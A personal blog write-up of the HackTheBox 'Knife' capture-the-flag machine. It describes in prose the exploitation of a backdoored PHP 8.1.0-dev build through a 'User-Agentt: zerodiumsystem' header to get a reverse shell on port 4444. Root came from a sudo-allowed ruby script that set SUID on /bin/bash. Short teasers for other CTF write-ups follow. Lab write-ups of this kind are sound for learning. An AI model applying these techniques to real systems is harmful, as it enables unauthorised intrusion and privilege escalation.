Hacking Knife (hackthebox)

First of all, I performed an nmap port scan on all ports.




I had a look at the versions of SSH and Apache running and tried finding exploits for them using a search engine. I found one to enumerate SSH usernames on msfconsole and used this successfully. Unfortunately, a bruteforce attack using the discovered usernames using default passwords and a password list did not work.

At the same time as the SSH attacks were running, I enumerated the website. I used Burpsuite's Repeater tool to have a look at the page's source code but could find nothing especially useful. I also ran dirbuster against it and used one of my own Python3 tools to check subdomains. These attacks did not turn up anything useful, so I went to bed!

As I was drifting off, I saw again in my mind the website and its source code. I suddenly had two realisations of what I could try next! One idea I had was that I could try tailor made subdomains and directories / files. The top of the webpage had words which didn't link to anything, and I had seen that as strange. The use of / made me think of directories!


I was half-tempted to get up and give these names a go with my subdomain finding tool and Burpsuite's Intruder tool, but I resisted the temptation and went to sleep! After work the next day, I did give them a go. I used different combinations of capital and lowercase letters, but this led to nothing new.

I then had a think about the second clue which had flashed into my mind the night before. The source code (patients, hospitals, providers) and the way it rendered in a browser led my mind to PHP!


I therefore returned to Burpsuite and used the Repeater tool to see if I could find a version of php in the header fields. When I looked, I was happy to see that the clue had paid off - the X-Powered-By key had the value PHP/8.1.0-dev



I felt like this was the first breadcrumb in the trail to the solution, so I checked online for a php 8.1.0 exploit. It didn't take long to find the following interesting piece of information on Github:


I decided to give this a go on the Burpsuite Repeater tool...things were finally feeling like I would soon have a shell on the target machine! :-)


The User-Agentt key had to be given a value which started with zerodiumsystem This was then followed by the command which was to be executed. For me, I used a shell command to open a reverse shell in an interactive mode back to my attacking machine on port 4444 using TCP. I launched a Netcat listener on port 4444 before sending the amended GET request. When no response showed up in the response pane, I felt that a shell must have been generated successfully - and it had! The user flag didn't take long to find... :-)



Before serving and downloading LinEnum onto the target system, I thought I would try a couple of things to check for privilege escalation. The first command I tried was sudo -l which revealed that the user james could run a file called knife as root without needing a password. I checked out the file and saw that it was a link to another file called knife. I checked that in turn and discovered that it was a ruby script.



Now I needed a way to leverage this permission to get a root shell. I first of all created a .rb file which used the ruby system() method to run an external shell command to set the SUID bit on /bin/bash so that any user would be able to run it as root. I then used james's ability to run the knife ruby script to execute my newly created .rb file. I checked /bin/bash and found that the SUID bit was successfully set. Finally, it was just a matter of running /bin/bash with the -p flag set so that the user would not be reset.


It did not take long to find the root flag... :-)



My favourite part about this machine was how the clues leading to a php exploit didn't register with me until I was nodding off to sleep. There was a sudden realisation when in my mind I saw the P H P on the website hammering home the clue which led to the eventual pwning of the box.

It was also nice to be able to play with Burpsuite's Intruder and Repeater tools and HTTP headers as I had been learning more about these a day or so before hacking this box!

Thanks to MrKN16H7 for creating it, and thank you for reading my write up :-)

Popular posts from this blog

Hacking Year of the Owl (thm)

Image
NOTE: I am currently migrating my writeups and cybersecurity notes to  my github This writeup can be found in a new and shiny form at puzz00 year of the owl writeup  --- The Year of the Owl is a machine by MuirlandOracle on tryhackme   We start by using nmap to scan the TCP ports. The results show us that this appears to be a windows machine because we see netbios on port 139, SMB on 445 and winrm on its default port of 5985. We take a closer look but don't find much of interest. Since SMB is running, we can try a null session attack, but this does not work. We cannot connect using rpcclient without valid creds, either. Web app enumeration does not reveal anything of interest, so I have not included it in this post. We need to find another way to enumerate usernames and potential passwords. We can try common UDP ports using nmap. The results come back in the open|filtered state which is not very useful. We do not know if the ports are open or if the UDP datagrams are bei...
Read more

Hacking Reset (thm)

Image
  NOTE: I am currently migrating my writeups and notes regarding hacking aka pentesting to  my github - my reset writeup can be found here     Reset is a fun active directory based box on thm   We start with an nmap scan which shows us that the target machine is probably a domain controller as it has port 88 open. Domain controllers typically have this port open since they are involved in kerberos based authentication. We also find some useful data regarding the domain and machine we are attacking. In addition, we find port 5985 is open - this is of interest as it is a port which is used by winrm which in turn is a service which could potentially give us a remote session on the target machine if we find valid credentials.    Since smb is being used, we start our enumeration of the haystack machine by taking a look at it - can we get a null session and thereby enumerate useful data? We find that we can. The IPC$ share has read access to non-authentica...
Read more

Simple CTF (tryhackme)

Image
  I started with a quick SYN scan of all ports on the target machine. The -T4 flag speeds up the scan from the default -T3 and the -p- flag specifies all ports to be scanned. As can be seen from the results, ports 21, 80 and 2222 had services listening on them. It was now time to take a closer look at those three ports, so I used the -A flag with nmap to find out more. The anonymous login allowed using FTP on port 21 seemed interesting, so I connected to it in passive mode using the username anonymous and no password ftp -p 10.10.179.144 The connection was successful, but I could not get any listing of the directories or files using ls so I turned my attention to port 80 by navigating to the home page in my browser. I was greeted with a default Apache "It Works!" page. I then checked the robots.txt file and fired up a directory buster. I used gobuster as it is fast, but dirb, dirbuster or a home-grown one would also do. The /simple directory stood out as interesting, so I na...
Read more